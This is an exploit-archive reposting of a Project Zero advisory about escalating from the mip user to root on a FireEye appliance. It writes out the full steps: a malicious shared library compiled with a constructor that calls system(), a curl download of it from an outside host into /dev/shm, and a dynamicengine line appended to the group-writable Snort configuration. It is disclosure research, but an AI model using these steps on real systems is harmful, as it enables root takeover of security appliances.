FireEye - Malware Input Processor (uid=mip) Privilege Escalation

2016-03-28T00:00:00
ID 1337DAY-ID-25550
Type zdt
Reporter Google Security Research
Modified 2016-03-28T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670
 
The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:
 
$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec  2 18:02 /data/snort/config/snort.conf
 
This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.
 
# mount | grep -v noexec | grep rw 
...
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)
 
It looks like /dev/shm is a good candidate for storing a shared library.
 
First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:
 
$ cat test.c 
void __attribute__((constructor)) init(void)
{
        system("/usr/bin/id > /tmp/output.txt");
}
$ gcc test.c -shared -s -fPIC -o test.so
 
Now fetch that object on the FireEye machine, and instruct snort to load it:
 
fireeye$ curl http://example.com/test.so > /dev/shm/test.so
fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf
 
The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:
 
fireeye$ cat /tmp/output.txt                                                           
uid=0(admin) gid=0(root) groups=0(root)
 
And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.

#  0day.today [2018-02-16]  #